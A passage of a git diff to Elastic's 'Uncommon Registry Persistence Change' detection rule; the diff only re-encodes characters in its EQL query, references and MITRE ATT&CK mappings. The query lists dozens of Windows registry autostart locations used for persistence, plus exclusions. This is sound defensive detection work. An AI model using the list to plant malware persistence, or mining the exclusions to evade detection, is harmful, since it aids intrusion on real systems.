\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", "references": [ - "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\u0026seqNum=2" + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_103.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_103.json index 47ceec757f9..6f82aaf10fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_103.json +++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_103.json @@ -11,9 +11,9 @@ "language": "eql", "license": "Elastic License v2", "name": "Uncommon Registry Persistence Change", - "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) > 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", "references": [ - "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\u0026seqNum=2" + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], "related_integrations": [ { @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_104.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_104.json index 2bf81df259b..0929aeef3cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_104.json +++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_104.json @@ -11,9 +11,9 @@ "language": "eql", "license": "Elastic License v2", "name": "Uncommon Registry Persistence Change", - "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) > 0 and */\n 